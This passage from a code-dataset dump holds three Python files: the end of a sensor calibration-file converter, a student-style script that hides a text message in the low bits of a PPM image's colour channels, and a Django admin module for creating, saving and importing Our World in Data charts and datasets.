filedate.strftime(\"%Y%m%d\")\n\n while True:\n outfile = filedialog.asksaveasfilename(initialfile=(\"CGINS-NUTNRB-%s__%s.csv\" % (fname_sn, fname_date)), defaultextension=\".csv\")\n # User cancelled...\n if not outfile:\n if not get_user(\"Would you like to cancel? Enter Y or [N]... \", \"defaultN\"):\n continue\n else:\n return False\n\n # Filename was chosen by user...\n with open(outfile, 'w', newline='') as newfile:\n writer = csv.writer(newfile)\n writer.writerow([\"serial\", \"name\",\"value\",\"notes\"])\n writer.writerow([serial_number, \"CC_cal_temp\", cal_temp,\"\"])\n writer.writerow([serial_number, \"CC_di\", json.dumps(di),\"\"])\n writer.writerow([serial_number, \"CC_eno3\", json.dumps(eno3), \"\"])\n writer.writerow([serial_number, \"CC_eswa\", json.dumps(eswa), \"\"])\n writer.writerow([serial_number, \"CC_lower_wavelength_limit_for_spectra_fit\", lwl, \"\"])\n writer.writerow([serial_number, \"CC_upper_wavelength_limit_for_spectra_fit\", uwl, \"\"])\n writer.writerow([serial_number, \"CC_wl\", json.dumps(wl), \"\"])\n\n print(\"New calibration file saved successfully. You should examine the file for errors.\")\n return True\n\ndef main():\n \"\"\"Main program logic\"\"\"\n while True:\n # Prompt user for serial number...\n serial_number = get_user(\"Enter the NUTNR-B serial number... \", \"str\")\n\n # A suddenly appearing dialog window might be confusing.\n # Prepare user for what is about to happen...\n input(\"In the next step, select the vendor provided calibration file. Press ENTER to continue...\")\n\n # Get the values we want from the calibration file...\n cal_data = load_cal_file()\n if not cal_data:\n # User cancelled...\n break\n\n input(\"In the next step, you will save the new formatted calibration file. Press ENTER to continue...\")\n \n if not save_cal_file(cal_data, serial_number, LOWER_WL_LIMIT, UPPER_WL_LIMIT):\n print(\"Operation cancelled\")\n\n # Prompt user to create a new cal file...\n if get_user(\"Would you like to create a new calibration file? [Y] or N... \", \"defaultY\"):\n continue\n\n print(\"Good bye!\")\n return\n\n##\n## Main\n## ====\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cal_nutnrb.py","file_name":"cal_nutnrb.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261892634","text":"import time\nimport argparse\nimport matplotlib.pyplot as plt\nimport multiprocessing as mp\nimport os\nimport sys\nimport threading\nimport array\nbarrera = threading.Barrier(3)\nbody_list = []\nfrom eleminar import eliminar_comentarios\nfrom separar import separar\nfrom bits import estego_mensaje\n\n\n\ndef modificar_rojo(b_mensaje):\n global body_list\n a = 0\n \n #print(\"HILO ROJO\")\n #print(b_mensaje)\n\n\n inicio = 0 + (3*(int(args.offset)))\n fin = inicio+len(b_mensaje)*(int(args.interleave)*3)\n step = int(args.interleave)*9\n \n #print(\"rojo\",inicio)\n\n for b in range(inicio,fin,step):\n \n z=0\n \n #print(\"rojo:\",b)\n #print(\"b=\",body_list[b])\n #print(\"a=\",a)\n #print(\"bits=\",b_mensaje[a])\n \n if body_list[b] %2 == 0 and b_mensaje[a] == 0 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 1 and z !=1:\n z=1\n pass\n \n elif body_list[b] %2 == 0 and b_mensaje[a] == 1 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n \n elif body_list[b] %2 == 1 and b_mensaje[a] == 0 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n \n\n #print(\"new valor:\",body_list[b])\n #print(\"----------------\")\n \n a = a+3\n\n barrera.wait()\n\n new_image = open(\"\"+args.output+\".ppm\", \"ab\")\n body = array.array('B', body_list)\n body.tofile(new_image)\n new_image.close()\n\n\ndef modificar_verde(b_mensaje):\n global body_list\n a = 1\n \n #print(\"HILO VERDE\")\n #print(b_mensaje)\n\n inicio = 4 + (3*(int(args.offset)) + ((int(args.interleave)-1)*3))\n if int(args.interleave) == 1:\n inicio = 4 + (3*(int(args.offset)))\n fin = inicio+len(b_mensaje)*(int(args.interleave)*3)\n step = int(args.interleave)*9\n\n #print(\"verde:\",inicio)\n\n if len(b_mensaje) %3 == 1:\n fin = fin - step\n \n for b in range(inicio,fin,step):\n\n z=0\n \n #print(\"verde:\",b)\n #print(\"b=\",body_list[b])\n #print(\"a=\",a)\n #print(\"bit=\",b_mensaje[a])\n \n if body_list[b] %2 == 0 and b_mensaje[a] == 0 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 1 and z !=1:\n z=1\n pass\n \n elif body_list[b] %2 == 0 and b_mensaje[a] == 1 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 0 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n \n \n #print(\"new valor:\",body_list[b])\n #print(\"----------------\")\n \n a = a+3\n\n barrera.wait()\n\ndef modificar_azul(b_mensaje):\n global body_list\n a = 2\n\n #print(\"HILO AZUL\")\n #print(b_mensaje)\n\n inicio = 8 + (3*(int(args.offset)) + ((int(args.interleave)+int(args.interleave)-2)*3))\n if int(args.interleave) == 1:\n inicio = 8 + (3*(int(args.offset)))\n fin = inicio+len(b_mensaje)*(int(args.interleave)*3)\n step = int(args.interleave)*9\n\n #print(\"azul:\",inicio)\n\n if len(b_mensaje) %3 == 1:\n fin = fin - step\n elif len(b_mensaje) %3 == 2:\n fin = fin - step\n\n for b in range(inicio,fin,step):\n z=0\n \n #print(\"azul:\",b)\n #print(\"a=\",a)\n #print(\"bits=\",b_mensaje[a])\n #print(body_list[b])\n \n if body_list[b] %2 == 0 and b_mensaje[a] == 0 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 1 and z !=1:\n z=1\n pass\n\n elif body_list[b] %2 == 0 and b_mensaje[a] == 1 and z !=1:\n z=1\n body_list[b] = body_list[b] + 1\n\n elif body_list[b] %2 == 1 and b_mensaje[a] == 0 and z !=1:\n z=1\n body_list[b] = body_list[b] - 1\n\n #print(\"new valor:\",body_list[b])\n #print(\"----------------\")\n\n a = a+3\n \n barrera.wait()\n\nif __name__ == \"__main__\":\n start_time = time.time()\n\n parser = argparse.ArgumentParser(usage=\"./esteganografia.py [-h] -s SIZE -f FILE -m FILE -f PIXELS -i PIXELS -o FILE2\")\n parser.add_argument(\"-f\", \"--file\", type=str, required=True, help=\"Archivo portador .ppm\")\n parser.add_argument(\"-s\", \"--size\", type=int, default=1024, help=\"Bloque de lectura\")\n parser.add_argument(\"-m\", \"--message\", type=str, help=\"Mensaje esteganografico\")\n parser.add_argument(\"-e\", \"--offset\", type=str, help=\"Mensaje offset en pixels del inicio del raster\")\n parser.add_argument(\"-i\", \"--interleave\", type=str, help=\"Interleave de modificacion en pixel\")\n parser.add_argument(\"-o\", \"--output\", type=str, default=\"mensaje_oculto\", help=\"Estego-mensaje\")\n args = parser.parse_args()\n\n #Manejo de errores\n\n if args.size <= 0:\n print(\"El tamano de lectura [-s] no puede ser negativo\")\n sys.exit()\n\n if int(args.offset) < 0 or int(args.interleave) < 0:\n print(\"El offset o interleave [-e -i] no puede ser negativos\")\n sys.exit()\n\n try:\n archivo = open(args.file,\"rb\")\n except FileNotFoundError:\n print(\"Archivo no encontrado\")\n sys.exit()\n\n name_file = len(args.file)\n if args.file[(name_file-3):name_file] != \"ppm\":\n print(\"El archivo -f debe ser .ppm\")\n sys.exit()\n\n name_file3 = len(args.message)\n if args.message[(name_file3-3):name_file3] != \"txt\":\n print(\"El archivo -m debe ser .txt\")\n sys.exit()\n\n\n archivo_mensaje = args.message\n\n b_mensaje,lista = estego_mensaje(archivo_mensaje)\n\n archivo = open(args.file,\"rb\")\n imagen_read = archivo.read(1024)\n imagen, ancho, alto = eliminar_comentarios(imagen_read)\n header = separar(imagen)\n \n #Verifico el tamaño de la imagen\n\n if ancho*alto < int(args.offset) + len(b_mensaje) * int(args.interleave):\n print(\"La imagen no tiene la cantidad necesaria de pixels para ocultar su mensaje\")\n sys.exit()\n\n #Coloco el puntero al inicio del cuerpo\n \n inicio_comentario = imagen_read.find(b\"\\n#\")\n fin_comentario = imagen_read.find(b\"\\n\", inicio_comentario + 1)\n tamano_comentario = fin_comentario - inicio_comentario\n inicio_body=len(header)+tamano_comentario\n archivo.seek(inicio_body)\n\n while True:\n lectura = archivo.read(args.size)\n for elemento in lectura:\n body_list.append(elemento)\n if not lectura:\n break\n\n new_image = open(\"\"+args.output+\".ppm\", \"w\")\n compu = \"#UMCOMPU2 \" + args.offset + \" \" + args.interleave + \" \" + str(len(lista)) + \"\\n\"\n new_image.write(header[:3])\n new_image.write(compu)\n new_image.write(header[3:])\n new_image.close()\n\n hilo_rojo = threading.Thread(target= modificar_rojo, args=(b_mensaje,))\n hilo_verde = threading.Thread(target= modificar_verde, args=(b_mensaje,))\n hilo_azul = threading.Thread(target= modificar_azul, args=(b_mensaje,))\n\n hilo_rojo.start()\n hilo_verde.start()\n hilo_azul.start()\n\n hilo_rojo.join()\n hilo_verde.join()\n hilo_azul.join()\n \n if hilo_rojo.is_alive()== False:\n print(\"Termino el Hilo Rojo...\")\n\n if hilo_verde.is_alive()== False:\n print(\"Termino el hilo Verde...\")\n\n if hilo_azul.is_alive()== False:\n print(\"Termino el Hilo Azul...\")\n\n\n \n \n print(\"Se genero correctamente\")\n print(\"--- %s segundos ---\" % (time.time() - start_time))","sub_path":"tps/tp2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184627167","text":"import copy\nimport datetime\nimport json\nimport os\nimport re\nimport csv\nimport glob\nimport os\nimport CloudFlare\nfrom unidecode import unidecode\nfrom io import StringIO\nfrom urllib.parse import urlparse\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.views import login as loginview\nfrom django.db.models import Q\nfrom django.db import connection\nfrom django.db import transaction\nfrom django.http import HttpRequest, HttpResponseRedirect, HttpResponse, HttpResponseNotFound, JsonResponse, QueryDict, StreamingHttpResponse\nfrom django.template.response import TemplateResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.crypto import get_random_string\nfrom .forms import InviteUserForm, InvitedUserRegisterForm\nfrom .models import Chart, Variable, User, UserInvitation, Logo, ChartSlugRedirect, ChartDimension, Dataset, Setting, DatasetCategory, DatasetSubcategory, Entity, Source, VariableType, DataValue, License\nfrom owid_grapher.views import get_query_string, get_query_as_dict\nfrom typing import Dict, Union\nfrom django.db import transaction\n\ndef custom_login(request: HttpRequest):\n \"\"\"\n Redirects to index page if the user is already logged in\n :param request: Request object\n :return: Redirects to index page if the user is logged in, otherwise will show the login page\n \"\"\"\n if request.user.is_authenticated():\n return HttpResponseRedirect(reverse('listcharts'))\n else:\n return loginview(request)\n\n\ndef listcharts(request: HttpRequest):\n charts = Chart.objects.all().order_by('-last_edited_at')\n allvariables = Variable.objects.all()\n vardict = {}\n for var in allvariables:\n vardict[var.pk] = {'id': var.pk, 'name': var.name}\n chartlist = []\n for chart in charts:\n each = {}\n each['id'] = chart.pk\n each['published'] = chart.published\n each['starred'] = chart.starred\n each['name'] = chart.name\n each['type'] = chart.show_type()\n each['slug'] = chart.slug\n each['notes'] = chart.notes\n each['origin_url'] = chart.origin_url\n each['last_edited_at'] = chart.last_edited_at\n if chart.last_edited_by:\n each['last_edited_by'] = chart.last_edited_by.name\n else:\n each['last_edited_by'] = None\n each['variables'] = []\n configfile = json.loads(chart.config)\n for chartvar in configfile['chart-dimensions']:\n if vardict.get(int(chartvar['variableId']), 0):\n each['variables'].append(vardict[int(chartvar['variableId'])])\n chartlist.append(each)\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse(chartlist, safe=False)\n else:\n return render(request, 'admin.charts.html', context={'current_user': request.user.name,\n 'charts': chartlist,\n })\n\n\ndef storechart(request: HttpRequest):\n if request.method == 'POST':\n chart = Chart()\n data = json.loads(request.body.decode('utf-8'))\n return savechart(chart, data, request.user)\n else:\n return HttpResponseRedirect(reverse('listcharts'))\n\n\ndef createchart(request: HttpRequest):\n\n data = editor_data()\n logos = []\n for each in list(Logo.objects.filter(name='OWD')):\n logos.append(each.svg)\n\n chartconfig = {}\n chartconfig['logosSVG'] = logos\n chartconfig_str = json.dumps(chartconfig)\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse({'data': data, 'config': chartconfig_str}, safe=False)\n else:\n return render(request, 'admin.edit_chart.html', context={'current_user': request.user.name,\n 'data': data, 'chartconfig': chartconfig_str,\n })\n\n\ndef editor_data():\n data = {}\n data['logos'] = []\n\n logos = Logo.objects.all()\n for each in logos:\n data['logos'].append(each.name)\n\n variable_query = Variable.objects.all().select_related()\n query_result = []\n for each in variable_query:\n query_result.append({'name': each.name, 'id': each.pk, 'unit': each.unit, 'description': each.description,\n 'dataset': each.fk_dst_id.name, 'category': each.fk_dst_id.fk_dst_cat_id.name,\n 'subcategory': each.fk_dst_id.fk_dst_subcat_id.name, 'namespace': each.fk_dst_id.namespace})\n optgroups = {}\n\n for result in query_result:\n if not optgroups.get(result['subcategory'], 0):\n optgroup = {}\n optgroup['name'] = result['subcategory']\n optgroup['namespace'] = result['namespace']\n optgroup['variables'] = []\n optgroups[result['subcategory']] = optgroup\n\n newresult = copy.deepcopy(result)\n if result['name'] != result['dataset']:\n newresult['name'] = result['dataset'] + ' - ' + result['name']\n\n optgroups[newresult['subcategory']]['variables'].append(newresult)\n\n namespaces = Dataset.objects.values('namespace').distinct()\n\n data['namespaces'] = namespaces\n data['optgroups'] = optgroups\n return data\n\n\ndef editchart(request: HttpRequest, chartid: Union[str, int]):\n try:\n chartid = int(chartid)\n except ValueError:\n return HttpResponseNotFound('Invalid chart id!')\n\n try:\n chart = Chart.objects.get(pk=chartid)\n except Chart.DoesNotExist:\n return HttpResponseNotFound('Invalid chart id!')\n\n data = editor_data()\n chartconfig = json.dumps(chart.get_config())\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse({'data': data, 'config': chartconfig}, safe=False)\n else:\n return render(request, 'admin.edit_chart.html', context={'current_user': request.user.name,\n 'data': data, 'chartconfig': chartconfig})\n\n\ndef savechart(chart: Chart, data: Dict, user: User):\n isExisting = chart.id != None\n\n if data.get('published'):\n if ChartSlugRedirect.objects.filter(~Q(chart_id=chart.pk)).filter(Q(slug=data['slug'])):\n return HttpResponse(\"This chart slug was previously used by another chart: %s\" % data[\"slug\"], status=402)\n elif Chart.objects.filter(~Q(pk=chart.pk)).filter(Q(slug=data['slug'])):\n return HttpResponse(\"This chart slug is currently in use by another chart: %s\" % data[\"slug\"], status=402)\n elif chart.published and chart.slug and chart.slug != data['slug']:\n # Changing the slug of an already published chart-- create a redirect\n try:\n old_chart_redirect = ChartSlugRedirect.objects.get(slug=chart.slug)\n old_chart_redirect.chart_id = chart.pk\n old_chart_redirect.save()\n except ChartSlugRedirect.DoesNotExist:\n new_chart_redirect = ChartSlugRedirect()\n new_chart_redirect.chart_id = chart.pk\n new_chart_redirect.slug = chart.slug\n new_chart_redirect.save()\n\n chart.name = data[\"title\"]\n data.pop(\"title\", None)\n\n chart.type = data[\"chart-type\"]\n data.pop(\"chart-type\", None)\n\n chart.notes = data[\"internalNotes\"]\n data.pop(\"internalNotes\", None)\n\n chart.slug = data[\"slug\"]\n data.pop(\"slug\", None)\n\n if data[\"published\"]:\n chart.published = data[\"published\"]\n data.pop(\"published\", None)\n\n data.pop(\"logosSVG\", None)\n\n dims = []\n i = 0\n\n chart.config = json.dumps(data)\n chart.last_edited_at = timezone.now()\n chart.last_edited_by = user\n chart.save()\n\n for dim in data[\"chart-dimensions\"]:\n newdim = ChartDimension()\n newdim.order = i\n newdim.chartId = chart\n newdim.color = dim.get('color', \"\")\n newdim.tolerance = dim.get('tolerance', None)\n newdim.targetyear = dim.get('targetYear', None)\n newdim.displayname = dim.get('displayName', \"\")\n newdim.isProjection = dim.get('isProjection', False)\n newdim.unit = dim.get('unit', None)\n newdim.property = dim.get('property', None)\n newdim.variableId = Variable.objects.get(pk=int(dim.get('variableId', None)))\n dims.append(newdim)\n i += 1\n\n for each in ChartDimension.objects.filter(chartId=chart.pk):\n each.delete()\n for each in dims:\n each.save()\n\n # Remove any old image exports as they will no longer represent the new chart state\n if isExisting:\n for path in glob.glob(os.path.join(settings.BASE_DIR, \"public/exports/\", chart.slug, \"*\")):\n os.remove(path)\n\n # Purge the Cloudflare cache for the chart config url\n # Also purge the html for some common query string urls to update the meta tags\n # TODO: a job queue / coverage of more urls with query strings\n if settings.CLOUDFLARE_KEY:\n config_url = f\"{settings.CLOUDFLARE_BASE_URL}/config/{chart.id}.js\"\n chart_url = f\"{settings.CLOUDFLARE_BASE_URL}/{chart.slug}\"\n urls_to_purge = [config_url, chart_url, chart_url + \"?tab=chart\", chart_url + \"?tab=map\", chart_url + \".csv\", chart_url + \".png\", chart_url + \".svg\"]\n cf = CloudFlare.CloudFlare(email=settings.CLOUDFLARE_EMAIL, token=settings.CLOUDFLARE_KEY)\n cf.zones.purge_cache.delete(settings.CLOUDFLARE_ZONE_ID, data={ \"files\": urls_to_purge })\n\n return JsonResponse({'success': True, 'data': {'id': chart.pk}}, safe=False)\n\n\ndef managechart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n if request.method == 'PUT':\n data = json.loads(request.body.decode('utf-8'))\n return savechart(chart, data, request.user)\n if request.method == 'POST':\n data = QueryDict(request.body.decode('utf-8'))\n if data.get('_method', '0') == 'DELETE':\n chart.delete()\n messages.success(request, 'Chart deleted successfully')\n return HttpResponseRedirect(reverse('listcharts'))\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showchartinternal', args=(chartid,)))\n\n\ndef showchart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n if request.method != 'GET':\n return JsonResponse(chart.get_config(), safe=False)\n else:\n # this part was lifted directly from the public facing side\n # so if anything changes there, be sure to make the same changes here\n configfile = chart.get_config()\n canonicalurl = request.build_absolute_uri('/') + chart.slug\n baseurl = request.build_absolute_uri('/') + chart.slug\n\n chartmeta = {}\n\n title = configfile['title']\n title = re.sub(\"/, \\*time\\*/\", \" over time\", title)\n title = re.sub(\"/\\*time\\*/\", \"over time\", title)\n chartmeta['title'] = title\n if configfile.get('subtitle', ''):\n chartmeta['description'] = configfile['subtitle']\n else:\n chartmeta['description'] = 'An interactive visualization from Our World In Data.'\n query_string = get_query_string(request)\n if query_string:\n canonicalurl += '?' + query_string\n chartmeta['canonicalUrl'] = canonicalurl\n if query_string:\n imagequery = query_string + '&' + \"size=1200x800&v=\" + chart.make_cache_tag()\n else:\n imagequery = \"size=1200x800&v=\" + chart.make_cache_tag()\n\n chartmeta['imageUrl'] = baseurl + '.png?' + imagequery\n\n configpath = \"%s/config/%s.js\" % (settings.BASE_URL, chart.pk)\n\n response = TemplateResponse(request, 'show_chart.html',\n context={'chartmeta': chartmeta, 'configpath': configpath,\n 'query': query_string\n })\n return response\n\n\n@transaction.atomic\ndef starchart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n\n if request.method == 'POST':\n Chart.objects.update(starred=False)\n chart.starred = True\n chart.save()\n return JsonResponse({'starred': True}, safe=False)\n\n\ndef unstarchart(request: HttpRequest, chartid: str):\n try:\n chart = Chart.objects.get(pk=int(chartid))\n except Chart.DoesNotExist:\n return HttpResponseNotFound('No such chart!')\n except ValueError:\n return HttpResponseNotFound('No such chart!')\n if request.method == 'POST':\n chart.starred = False\n chart.save()\n return JsonResponse({'starred': False}, safe=False)\n\n\ndef importdata(request: HttpRequest):\n datasets = Dataset.objects.filter(namespace='owid').order_by('name').values()\n datasetlist = []\n for each in datasets:\n each['fk_dst_subcat_id'] = each['fk_dst_subcat_id_id'] # XXX\n each['created_at'] = str(each['created_at'])\n each['updated_at'] = str(each['updated_at'])\n datasetlist.append(each)\n\n vartypes = Variable.objects.values()\n vartypeslist = []\n for each in vartypes:\n each['created_at'] = str(each['created_at'])\n each['updated_at'] = str(each['updated_at'])\n each['uploaded_at'] = str(each['uploaded_at'])\n vartypeslist.append(each)\n\n source_template = dict(Setting.objects.filter(meta_name='sourceTemplate').values().first())\n source_template['created_at'] = str(source_template['created_at'])\n source_template['updated_at'] = str(source_template['updated_at'])\n\n categories = DatasetSubcategory.objects.all().select_related().order_by('fk_dst_cat_id__pk').order_by('pk')\n category_list = []\n for each in categories:\n category_list.append({'name': each.name, 'id': each.pk, 'parent': each.fk_dst_cat_id.name})\n entitynames = Entity.objects.all()\n entitynameslist = []\n entitycodeslist = []\n for each in entitynames:\n entitynameslist.append(each.name)\n entitycodeslist.append(each.code)\n all_entitynames = entitynameslist + entitycodeslist\n\n data = {'datasets': datasetlist, 'categories': category_list, 'varTypes': vartypeslist, 'sourceTemplate': source_template,\n 'entityNames': all_entitynames}\n\n if '.json' in urlparse(request.get_full_path()).path:\n return JsonResponse(data, safe=False)\n else:\n return render(request, 'admin.importer.html', context={'current_user': request.user.name,\n 'importerdata': json.dumps(data)})\n\n\ndef store_import_data(request: HttpRequest):\n if request.method == 'POST':\n try:\n with transaction.atomic():\n data = json.loads(request.body.decode('utf-8'))\n\n datasetmeta = data['dataset']\n entities = data['entities']\n entitynames = data['entityNames']\n years = data['years']\n variables = data['variables']\n\n datasetprops = {'name': datasetmeta['name'],\n 'description': datasetmeta['description'],\n 'fk_dst_cat_id': DatasetSubcategory.objects.get(pk=datasetmeta['subcategoryId']).fk_dst_cat_id,\n 'fk_dst_subcat_id': DatasetSubcategory.objects.get(pk=datasetmeta['subcategoryId'])\n }\n\n if datasetmeta['id']:\n dataset = Dataset.objects.get(pk=datasetmeta['id'])\n Dataset.objects.filter(pk=datasetmeta['id']).update(updated_at=timezone.now(), **datasetprops)\n else:\n dataset = Dataset(**datasetprops)\n dataset.save()\n\n dataset_id = dataset.pk\n\n codes = Entity.objects.filter(validated=True).values('name', 'code')\n\n codes_dict = {}\n\n for each in codes:\n codes_dict[each['code']] = each['name']\n\n entitynames_list = Entity.objects.values_list('name', flat=True)\n\n for i in range(0, len(entitynames)):\n name = entitynames[i]\n if codes_dict.get(name, 0):\n entitynames[i] = codes_dict[name]\n\n entitynames_to_insert = []\n\n for each in entitynames:\n if each not in entitynames_list:\n entitynames_to_insert.append(each)\n\n alist = [Entity(name=val, validated=False) for val in entitynames_to_insert]\n\n Entity.objects.bulk_create(alist)\n\n codes = Entity.objects.values('name', 'id')\n\n entitiy_name_to_id = {}\n\n for each in codes:\n entitiy_name_to_id[each['name']] = each['id']\n\n source_ids_by_name: Dict[str, str] = {}\n\n for variable in variables:\n source_name = variable['source']['name']\n if source_ids_by_name.get(source_name, 0):\n source_id = source_ids_by_name[source_name]\n else:\n if variable['source']['id']:\n source_id = variable['source']['id']\n else:\n source_id = None\n source_desc = variable['source']['description']\n if source_id:\n Source.objects.filter(pk=source_id).update(updated_at=timezone.now(), **variable['source'])\n else:\n new_source = Source(datasetId=dataset_id, name=source_name, description=source_desc)\n new_source.save()\n source_id = new_source.pk\n source_ids_by_name[source_name] = source_id\n\n values = variable['values']\n variableprops = {'name': variable['name'], 'description': variable['description'], 'unit': variable['unit'],\n 'coverage': variable['coverage'], 'timespan': variable['timespan'],\n 'fk_var_type_id': VariableType.objects.get(pk=3),\n 'fk_dst_id': Dataset.objects.get(pk=dataset_id),\n 'sourceId': Source.objects.get(pk=source_id),\n 'uploaded_at': timezone.now(),\n 'updated_at': timezone.now(),\n 'uploaded_by': request.user\n }\n if variable['overwriteId']:\n Variable.objects.filter(pk=variable['overwriteId']).update(**variableprops)\n varid = variable['overwriteId']\n else:\n varid = Variable(**variableprops)\n varid.save()\n varid = varid.pk\n DataValue.objects.filter(fk_var_id=Variable.objects.get(pk=varid)).delete()\n\n newdatavalues = []\n\n for i in range(0, len(years)):\n if values[i] == '':\n continue\n\n newdatavalues.append(DataValue(fk_var_id=Variable.objects.get(pk=varid),\n fk_ent_id=Entity.objects.get(pk=entitiy_name_to_id[entitynames[entities[i]]]),\n year=years[i],\n value=values[i]))\n\n if len(newdatavalues) > 10000:\n DataValue.objects.bulk_create(newdatavalues)\n newdatavalues = []\n\n if len(newdatavalues) > 0:\n DataValue.objects.bulk_create(newdatavalues)\n with connection.cursor() as cursor:\n cursor.execute(\"DELETE FROM sources WHERE sources.id NOT IN (SELECT variables.sourceId FROM variables)\")\n\n return JsonResponse({'datasetId': dataset_id}, safe=False)\n except Exception as e:\n if len(e.args) > 1:\n error_m = str(e.args[0]) + ' ' + str(e.args[1])\n else:\n error_m = e.args[0]\n return HttpResponse(error_m, status=500)\n\n\ndef listdatasets(request: HttpRequest):\n variables = Variable.objects.filter(fk_dst_id__namespace='owid').select_related('fk_dst_id').order_by('-fk_dst_id__updated_at')\n datasets: Dict = {}\n for each in variables:\n if each.uploaded_by:\n uploaded_by = each.uploaded_by.name\n else:\n uploaded_by = None\n if datasets.get(each.fk_dst_id.pk, 0):\n datasets[each.fk_dst_id.pk]['variables'].append({'name': each.name, 'id': each.pk,\n 'uploaded_at': str(each.uploaded_at),\n 'uploaded_by': uploaded_by})\n else:\n datasets[each.fk_dst_id.pk] = {'name': each.fk_dst_id.name, 'id': each.fk_dst_id.pk, 'variables': [{'name': each.name,\n 'id': each.pk,\n 'uploaded_at': str(\n each.uploaded_at),\n 'uploaded_by': uploaded_by\n }]}\n dataset_list = []\n for value in sorted(datasets.keys(), reverse=True):\n dataset_list.append(datasets[value])\n return render(request, 'admin.datasets.html', context={'current_user': request.user.name,\n 'datasets': dataset_list})\n\n\ndef showdataset(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.get(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n dataset_dict = {'id': dataset.pk, 'name': dataset.name, 'category': dataset.fk_dst_cat_id.name,\n 'subcategory': dataset.fk_dst_subcat_id.name,\n 'description': dataset.description}\n\n dataset_vars = Variable.objects.filter(fk_dst_id=dataset)\n dataset_chartdims = ChartDimension.objects.filter(variableId__in=dataset_vars)\n dataset_chart_ids = []\n for each in dataset_chartdims:\n dataset_chart_ids.append(each.chartId.pk)\n dataset_charts = Chart.objects.filter(pk__in=dataset_chart_ids).values()\n return render(request, 'admin.datasets.show.html', context={'current_user': request.user.name,\n 'dataset': dataset_dict,\n 'variables': dataset_vars.values(),\n 'charts': dataset_charts,\n })\n\n\ndef editdataset(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.filter(pk=int(datasetid)).values()[0]\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n sources_list = []\n sources = Source.objects.all().values('pk', 'name')\n for each in sources:\n sources_list.append({'id': int(each['pk']), 'name': each['name']})\n cats_list = []\n categories = DatasetCategory.objects.values('pk', 'name')\n for each in categories:\n cats_list.append({'id': int(each['pk']), 'name': each['name']})\n subcats_list = []\n subcategories = DatasetSubcategory.objects.values('pk', 'name')\n for each in subcategories:\n subcats_list.append({'id': int(each['pk']), 'name': each['name']})\n return render(request, 'admin.datasets.edit.html', context={'current_user': request.user.name,\n 'dataset': dataset,\n 'sources': sources_list,\n 'categories': cats_list,\n 'subcategories': subcats_list,\n })\n\n\ndef managedataset(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.filter(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n if request.method == 'POST':\n request_dict = QueryDict(request.body.decode('utf-8')).dict()\n if request_dict['_method'] == 'DELETE':\n try:\n dataset.delete()\n except Exception as e:\n if e.args[0] == 1451:\n messages.error(request, 'Dataset cannot be deleted while a chart still needs it. Delete charts or change their variables first.')\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n else:\n messages.error(request, e.args[1])\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n messages.success(request, 'Dataset deleted.')\n return HttpResponseRedirect(reverse('listdatasets'))\n if request_dict['_method'] == 'PATCH':\n request_dict.pop('_method', None)\n request_dict.pop('csrfmiddlewaretoken', None)\n request_dict['fk_dst_cat_id'] = DatasetCategory.objects.get(pk=request_dict['fk_dst_cat_id'])\n request_dict['fk_dst_subcat_id'] = DatasetSubcategory.objects.get(pk=request_dict['fk_dst_subcat_id'])\n Dataset.objects.filter(pk=datasetid).update(updated_at=timezone.now(), **request_dict)\n messages.success(request, 'Dataset updated!')\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n\n if request.method == 'GET':\n return HttpResponseRedirect(reverse('showdataset', args=[datasetid]))\n\n\ndef dataset_csv(request: HttpRequest, datasetid: str):\n try:\n dataset = Dataset.objects.get(pk=int(datasetid))\n except Dataset.DoesNotExist:\n return HttpResponseNotFound('Dataset does not exist!')\n\n allvariables = Variable.objects.all()\n chartvarlist = []\n\n for var in allvariables:\n if var.fk_dst_id == dataset:\n chartvarlist.append({'id': var.pk, 'name': var.name})\n\n chartvarlist = sorted(chartvarlist, key=lambda k: k['id'])\n\n id_tuple = ''\n varlist = []\n headerlist = ['Entity', 'Year']\n\n for each in chartvarlist:\n id_tuple += str(each['id']) + ','\n headerlist.append(each['name'])\n varlist.append(each['id'])\n\n id_tuple = id_tuple[:-1]\n\n 